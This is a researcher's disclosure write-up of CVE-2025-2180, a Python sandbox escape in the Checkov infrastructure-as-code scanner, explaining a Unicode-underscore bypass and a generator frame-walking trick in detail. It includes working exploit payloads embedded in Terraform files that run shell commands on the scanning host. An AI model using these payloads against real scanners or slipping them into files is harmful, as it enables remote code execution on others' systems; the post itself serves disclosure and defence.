CVE-2025-2180 - Breaking out of a Python Jail in a Popular IaC Scanning Tool
The Quick Summary #
- This blog post describes a vulnerability in the infrastructure-as-code scanning tool Checkov that allows for arbitrary code execution if it is run on untrusted Terraform files.
- The vulnerability involves escaping from a Python sandbox and evading a check that blocks double-underscore attributes. We’ll walk through two bypasses: one involving Unicode characters, and one using a generator trick that digs deep into Python internals.
- I was able to use this vulnerability to gain RCE on a SaaS code-scanning product. This CVE serves as a reminder that third-party code scanning or linting tools should be used with caution, and ideally executed within a sandbox.
Background - An Earlier CVE in Checkov #
Back in 2021, I was playing around with the IaC scanning tool Checkov. While browsing through the source code, I stumbled across a few interesting lines of code.
def _try_evaluate(input_str):
    try:
        return eval(input_str, {"__builtins__": None}, SAFE_EVAL_DICT) # nosec
    except Exception:
        ...
Show this to any security nerd who’s familiar with Python, and they’ll immediately recognize it: this is a classic example of an unsafe Python jail. I’m not entirely sure where the idea originated, but this specific invocation of eval is often considered a “safe” way to execute arbitrary user-supplied Python code. The idea is that if you strip the builtins out of the globals (the second argument to eval) and restrict the locals (the third argument) to a small set of safe names, the code passed into eval won’t have access to anything interesting and therefore can’t do anything dangerous.
This is, of course, not the case. Python allows a lot of introspection, and this jail leaves plenty of room for escape. The typical approach is to recover the builtins, which can usually be achieved by chaining together a series of dunder attributes. You start with {}.__class__.__bases__, then poke around until you are able to find the builtins and grab __import__. From there, you import os, then execute shell commands via os.system. Using list comprehensions, this can all be done within a single expression. A full Python jail escape looks something like this 1:
[x for x in {}.__class__.__bases__[0].__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('whoami')
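To see how much introspection survives the "no builtins" restriction, here is a harmless sketch that stops at listing the subclasses of `object` instead of running a command. It is not Checkov code: the helper name `jailed_eval` is made up for illustration, and an empty dict stands in for `SAFE_EVAL_DICT`.

```python
def jailed_eval(expr):
    # Same shape as the eval call above; the empty dict is an assumed
    # stand-in for SAFE_EVAL_DICT.
    return eval(expr, {"__builtins__": None}, {})

# Ordinary builtin names such as `len` are unavailable inside the jail...
try:
    jailed_eval("len('abc')")
    builtin_call_worked = True
except Exception:
    builtin_call_worked = False

# ...but attribute access on a literal still reaches `object` and, from
# there, every class currently loaded in the interpreter.
base = jailed_eval("{}.__class__.__bases__[0]")
subclasses = jailed_eval("{}.__class__.__bases__[0].__subclasses__()")
```

Everything the full escape needs is reachable from that list of classes, which is why removing the builtins alone does not make `eval` safe.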
In the case of Checkov, this code was being used to evaluate Terraform arguments. The vulnerability could be exploited by supplying Checkov with a malicious Terraform file, such as the one below. Running Checkov on this file will cause sleep 10 to run on the host system:
resource "random_pet" "server" {
  keepers = {
    ami_id = "[x for x in {}.__class__.__bases__[0].__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']('os').system('sleep 10')"
  }
}
I sent this POC to the Checkov maintainers through their responsible disclosure program.
An Incomplete Fix #
After assigning CVE-2021-3040 to this issue, the Checkov maintainers decided to fix this vulnerability by blocking any input string that contained a double underscore, theoretically blocking the ability to access the attributes necessary for the exploit.
def evaluate(input_str):
    if "__" in input_str:
        logging.warning(f"got a substring with double underscore, which is not allowed. origin string: {input_str}")
        return input_str
    return eval(input_str, {"__builtins__": None}, SAFE_EVAL_DICT) # nosec
This fix didn’t sit well with me—it seemed plausible that there was a way to execute arbitrary code without using a double underscore. I didn’t have a POC, nor the time to research the problem further, so I decided to move on. Years later, this project caught my attention again, and I noticed that the eval code had not changed. I decided to spend some time looking for a bypass to the underscore check. After a bit of research and experimentation, I was able to produce two separate bypasses.
Bypass One: Unicode Underscores #
The first solution is a neat little party trick. Python allows the use of non-ASCII characters in identifiers, but applies a process called NFKC normalization to them while parsing, which maps many of these characters to an ASCII equivalent. There are a handful of non-ASCII “underscores” that are normalized by this process and can be used as drop-in replacements for an underscore in most places in Python code. Examples include the full-width low line (U+FF3F) and the dashed low line (U+FE4D) shown below. Crucially, these characters are normalized by the Python interpreter if they appear within identifiers, but remain untouched if they appear in strings. For example:
>>> # Example character that will normalize to an underscore
>>> chr(0xFE4D)
'﹍'
>>> underscore_example_variable = 123
>>> underscore﹍example﹍variable
123
>>> '_' in 'no﹍underscores﹍here'
False
This property allows us to bypass the "__" in input_str check: these characters are normalized after the check, when the eval executes. We can reuse the previous exploit, swapping in a Unicode character in place of some of the underscores:
resource "random_pet" "server" {
  keepers = {
    ami_id = "[x for x in {}._﹎class_﹎._﹎bases_﹎[0]._﹎subclasses_﹎() if x._﹎name_﹎ == 'catch_warnings'][0]()._module._﹎builtins_﹎['_'+'_import_'+'_']('os').system('date >> /tmp/unicode-example')"
  }
}
Running Checkov against this file again gives us arbitrary code execution. Wow, that was quite easy 🎉
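The bypass can be reproduced with a harmless payload. The sketch below re-creates the patched check from the post (minus the logging) and uses an empty dict as an assumed stand-in for `SAFE_EVAL_DICT`; the payload only asks for the class of an empty tuple.

```python
import unicodedata

def evaluate(input_str):
    # Re-creation of the patched check; the empty dict is an assumed
    # stand-in for SAFE_EVAL_DICT.
    if "__" in input_str:
        return input_str
    return eval(input_str, {"__builtins__": None}, {})

LOW_LINE = "\uFE4E"  # CENTRELINE LOW LINE, one of the characters NFKC maps to "_"

ascii_payload = "().__class__"
unicode_payload = "()._" + LOW_LINE + "class_" + LOW_LINE

blocked = evaluate(ascii_payload)     # caught by the check, returned as a plain string
bypassed = evaluate(unicode_payload)  # passes the check, then the parser normalizes it
normalized = unicodedata.normalize("NFKC", LOW_LINE)
```

The string check sees no double underscore in `unicode_payload`, yet the expression resolves the `__class__` attribute once the parser has normalized the identifier.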
Bypass Two: Walking Up the Call Stack #
The Unicode bypass felt a bit unsatisfying. I anticipated that the maintainers might fix this issue by simply normalizing Unicode characters, so I decided to see if I could come up with a better exploit. Is there a clever way to sneak around the dunder check assuming no special Unicode characters are allowed?
As it turns out, yes. Here’s a sneak peek of the full exploit, then let’s talk about how it works:
resource "random_pet" "server" {
  keepers = {
    ami_id = "(lambda gen: (gen:=(gen.gi_frame.f_back.f_back.f_globals for _ in [1])))(None).send(None).get('_'+ '_builtins_' +'_')['_'+'_import_'+'_']('os').system('whoami')"
  }
}
Note: this is going to get into some nitty-gritty details about Python internals. If you’d prefer to skip this part, jump ahead to the Impact section.
Starting With A Generator #
The execution environment in eval is very limited: no builtins, no imports, no getattr, and only a handful of available functions. We do still have access to Python’s built-in types, which includes generators.
Generators are a lazily evaluated way of returning a sequence of items—if you’ve ever seen the yield keyword in Python code, you’re familiar. Python also provides syntactic sugar for creating generators: generator expressions. The syntax is (x for x in [1,2,3]), which is conveniently allowed within the restricted eval environment:
>>> eval('(x for x in (1,2,3))', {'__builtins__': None}, {})
<generator object <genexpr> at 0x104f007c0>
Why is this useful? Generators have a special gi_frame attribute that will be very useful (note the lack of a double underscore), but to explain that, we need to take a quick tangent into Python internals to learn about frames.
Frames #
Every function call in Python creates a new frame object that is pushed onto the interpreter’s call stack. A frame holds a reference to the function’s compiled bytecode (f_code), the current instruction index (f_lasti), the function’s global and local namespaces, and several other execution details. Frames are linked together through the f_back attribute, which points to the caller’s frame, forming a linked list that mirrors the call stack.
Generators use a frame object to hold execution state, accessible via the gi_frame attribute. The frame is set up along with the generator object and starts executing when the generator is first advanced. After each yield, the frame’s state is suspended, allowing it to be resumed on the next iteration. While the generator is running, its frame’s f_back reference points to the caller’s frame.
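As a small illustration of the f_back chain for ordinary function calls, the sketch below walks upward from the current frame and records the name stored in each frame's code object. The function names are made up for the example.

```python
import inspect

def inner():
    frame = inspect.currentframe()
    # Follow f_back three times, collecting each frame's function name.
    names = []
    while frame is not None and len(names) < 3:
        names.append(frame.f_code.co_name)
        frame = frame.f_back
    return names

def middle():
    return inner()

def outer():
    return middle()

chain = outer()  # innermost frame first
```

Each frame also exposes `f_globals`, which is the attribute the exploit ultimately reads once it has walked far enough up the stack.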
A Path To an Exploit #
Putting all these pieces together, we should be able to use a generator to escape our Python jail and recover the builtins. A generator expression lets us create a generator object, from which we can access its frame via gi_frame. This frame’s globals and builtins are empty because it was created from within the eval context, but we can use its f_back attribute to walk upward on the call stack until we reach a frame that has a reference to the builtins.

The exploit code would essentially be:
(i for i in [1,2,3])                 # Generator expression
    .gi_frame.f_back.f_back          # Access frame, walk up two frames
    .f_globals.get('__builtins__')   # Grab builtins from that frame's globals
    ['__import__']('os').system('')  # Grab import, run code.
If only it were so simple! There is one detail that makes this exploit quite a bit more complicated…
A Missing f_back #
If you try to run the code above, you’ll notice the problem. The generator’s gi_frame has an empty f_back pointer, which means no walking up the call stack, and no access to the builtins. This is the case for all generators: the f_back pointer is cleared after each iteration. You can see this happening in the Python source code 2:
result = _PyEval_EvalFrame(tstate, f, exc);
tstate->exc_info = gen->gi_exc_state.previous_item;
gen->gi_exc_state.previous_item = NULL;
/* Don't keep the reference to f_back any longer than necessary. It
* may keep a chain of frames alive or it could create a reference
* cycle. */
assert(f->f_back == tstate->frame);
Py_CLEAR(f->f_back);
Examining the Python source code reveals an opportunity, though. The f_back pointer is populated during each iteration of the generator (the call to _PyEval_EvalFrame), but cleared afterward. If we’re able to get inside the generator and grab the f_back pointer before the generator yields, it should let us access the caller frame. How can we achieve that? We’ll need some serious Python trickery for this.
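The cleared pointer is easy to observe from outside a generator. A minimal check, using only a throwaway generator expression:

```python
gen = (x for x in (1, 2, 3))

before_start = gen.gi_frame.f_back     # generator has not run yet
first = next(gen)
while_suspended = gen.gi_frame.f_back  # generator is paused at a yield
rest = list(gen)
after_exhaustion = gen.gi_frame        # the frame itself is released at the end
```

In every state that outside code can observe, there is no link back to a caller, so the reference has to be captured by code running inside the generator.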
A Generator With A Pointer To Itself #
OK, here’s the plan: we’re going to make a generator that yields its own gi_frame.f_back so that we can grab the reference before it is cleared. This involves defining a generator that references a variable in the local scope, then assigning that variable to an instance of the generator, creating a circular reference where the generator has a pointer to itself. Here’s what that looks like in long-form Python:
gen = None # Variable that will hold the generator
def generator():
    # Before we yield, f_back is populated
    yield gen.gi_frame.f_back
gen = generator() # Create the generator, assign it to gen
f_back = gen.send(None) # Start the generator
This gives us access to a frame containing __builtins__. Now the challenge is doing that from within eval. We are limited to a single expression and can’t define functions or assign variables. Thankfully, Python is a very expressive language, and you can pack a lot of madness into a single line.
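Here is the same idea wrapped in a function so the result can be inspected. This is a sketch for illustration; `grab_caller_frame` is a made-up name, and it uses a closure variable rather than a module-level one.

```python
def grab_caller_frame():
    gen = None  # rebound below; the nested generator sees the new value

    def generator():
        # While this body runs, the generator's frame is linked to its caller.
        yield gen.gi_frame.f_back

    gen = generator()
    inside = gen.send(None)        # frame of whoever resumed the generator
    outside = gen.gi_frame.f_back  # read after the yield, from outside
    return inside, outside

inside, outside = grab_caller_frame()
caller_name = inside.f_code.co_name
has_builtins = "__builtins__" in inside.f_globals
```

The frame captured from inside belongs to the function that called `send`, and its globals carry a `__builtins__` entry, while the same attribute read from outside is empty again.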
Packing it All Into One Expression #
Although eval does not allow assignment, we can sneak around that limitation using the walrus operator (:=). This allows us to create our generator and assign to a variable in one expression. Lastly, a call to send() starts the generator and gives us access to the frame we need:
>>> (gen:=(gen.gi_frame.f_back for _ in [1])).send(None)
<frame at 0x1045f4f60, file '<stdin>-3', line 1, code <module>>
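This is very close, but there is one additional step. The expression above works in a Python REPL, but it doesn’t work within eval, where the gen variable won’t resolve. This is because of a subtlety in how free variables are resolved within eval: the walrus binds gen in eval’s local namespace, while the nested generator expression looks the name up as a global, and here those are two different dictionaries.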
To get around this limitation, we need to create a closure that contains the gen variable. There are multiple ways to accomplish this, but I found that wrapping the entire expression in a lambda is the most elegant and readable.
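The difference between the two forms can be checked with a harmless payload that only yields a frame. In this sketch `jailed_eval` is a made-up helper and the empty dict is an assumed stand-in for `SAFE_EVAL_DICT`.

```python
def jailed_eval(expr):
    # Separate globals and locals dicts, as in the vulnerable call.
    return eval(expr, {"__builtins__": None}, {})

PLAIN = "(gen := (gen.gi_frame.f_back for _ in [1])).send(None)"
WRAPPED = "(lambda gen: (gen := (gen.gi_frame.f_back for _ in [1])))(None).send(None)"

# Without a closure, the generator body cannot find `gen`.
try:
    jailed_eval(PLAIN)
    plain_error = None
except Exception as exc:
    plain_error = type(exc).__name__

# With the lambda, `gen` is a closure variable shared by both scopes.
frame = jailed_eval(WRAPPED)
frame_file = frame.f_code.co_filename  # the eval'd expression's own frame
```

The wrapped form returns the frame of the evaluated expression itself, which is the first hop of the walk; one more `f_back` reaches the function that called `eval`.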
Here is our final exploit:
(lambda gen: (gen:=(gen.gi_frame.f_back.f_back.f_globals for _ in [1])))(None).send(None).get('_'+ '_builtins_' +'_')['_'+'_import_'+'_']('os').system('whoami')
There’s a lot going on in that single line of Python. Here’s a breakdown that shows the exploit step by step.
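The steps can be followed with a harmless variant that stops once it has leaked the caller's globals and never imports anything. This is an annotated sketch, not the exact payload: `jailed_eval` is a made-up helper and the empty dict is an assumed stand-in for `SAFE_EVAL_DICT`.

```python
def jailed_eval(expr):
    # Same shape as the vulnerable call.
    return eval(expr, {"__builtins__": None}, {})

PAYLOAD = (
    "(lambda gen: "    # 1. lambda parameter gives the genexpr a closure variable
    "(gen := "         # 2. walrus rebinds that variable to the generator itself
    "(gen.gi_frame"    # 3. inside the running generator: its own frame
    ".f_back"          #    -> frame of the eval'd expression (the caller of send)
    ".f_back"          #    -> frame of the function that called eval
    ".f_globals "      #    -> that function's global namespace
    "for _ in [1])))"  #    single-iteration generator expression
    "(None)"           # 4. call the lambda, which returns the generator
    ".send(None)"      # 5. start the generator so it yields the globals
)

leaked = jailed_eval(PAYLOAD)
# Build the key from pieces so the payload style matches the post.
builtins_obj = leaked.get("_" + "_builtins_" + "_")
```

The full exploit continues from `builtins_obj` by looking up `__import__`, again assembling the name from string pieces so that the source never contains a double underscore.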
Impact #
This vulnerability allows for arbitrary code execution if Checkov is run on an untrusted file. Code scanning tools like Checkov are often thought to be safe, and are used without much consideration of the security risk they may pose. This vulnerability is a good reminder that third-party scanning tools should be executed with a bit of caution, ideally within some kind of sandbox or limited execution environment.
This vulnerability is especially concerning for any SaaS products that rely on Checkov under the hood. A few weeks after the fix was released, I found a code scanning product that was running a vulnerable version of Checkov. By creating a pull request against a private repository, then scanning my pull request with their tool, I was able to execute arbitrary code on their infrastructure. I responsibly disclosed this issue and it was fixed within hours.
The Fix: A Safer Way to Evaluate Python? #
The Checkov maintainers fixed this issue by removing the eval statement and replacing it with lmfit/asteval, a “safe(ish) evaluator of Python expressions and statements.” This library implements a more minimal Python interpreter by parsing the expression with ast.parse, then using custom logic to evaluate the abstract syntax tree while blocking potentially dangerous attribute access and function calls.
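To make the AST-walking idea concrete, here is a deliberately tiny evaluator. It is not asteval's implementation or API; `tiny_eval` and its operator table are hypothetical and support only constants, named values, and four arithmetic operators. Anything else, including attribute access, is rejected by default.

```python
import ast
import operator

# Allowlist of binary operators; everything not listed is refused.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}

def tiny_eval(expr, names=None):
    names = names or {}

    def visit(node):
        if isinstance(node, ast.Expression):
            return visit(node.body)
        if isinstance(node, ast.Constant):
            return node.value
        if isinstance(node, ast.Name):
            return names[node.id]
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](visit(node.left), visit(node.right))
        # Attribute access, calls, lambdas, comprehensions, and so on.
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return visit(ast.parse(expr, mode="eval"))

total = tiny_eval("1 + 2 * 3")
scaled = tiny_eval("x * 2", {"x": 21})
try:
    tiny_eval("().__class__")
    rejected = False
except ValueError:
    rejected = True
```

The design choice that matters is the default: node types are denied unless explicitly handled, which is the opposite of filtering known-bad strings out of input passed to `eval`.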
I wouldn’t bet on asteval being completely bulletproof. Sandboxing Python is notoriously difficult—although asteval’s strategy is a much smarter approach, it still feels like betting against the house.
While writing this blog post, I reviewed recent CTF challenges involving Python jails as a way to catch up on the state of the art. I was thoroughly impressed by the arsenal of tricks CTF players have developed for attacking Python jails. Suffice it to say, I wouldn’t trust any sort of Python-based eval sandboxing. If you find yourself in a position where you need to eval or exec user input, it’s probably best to wrap the whole thing in an OS-level sandbox.
Also, while doing this CTF literature review, I discovered that this generator trick is not new. Some folks in the CTF community seem to have known about it for a while. In fact, it appeared as a challenge in Samsung CTF 2023, with four solves. Unsurprisingly, CTF players beat me to the punch on this jail escape. Regardless, it was a very fun little puzzle to solve 🙂.
That’s all—thanks for reading!
1. Depending on where the eval statement occurs, __builtins__ might be either a dictionary or a module object, which changes the exploit slightly. In the case of a module, it’s often necessary to recover __builtins__.getattr first, then use that to access __import__.
2. This code snippet is from Python 3.10. The code in later Python versions is more convoluted, but the behavior remains the same.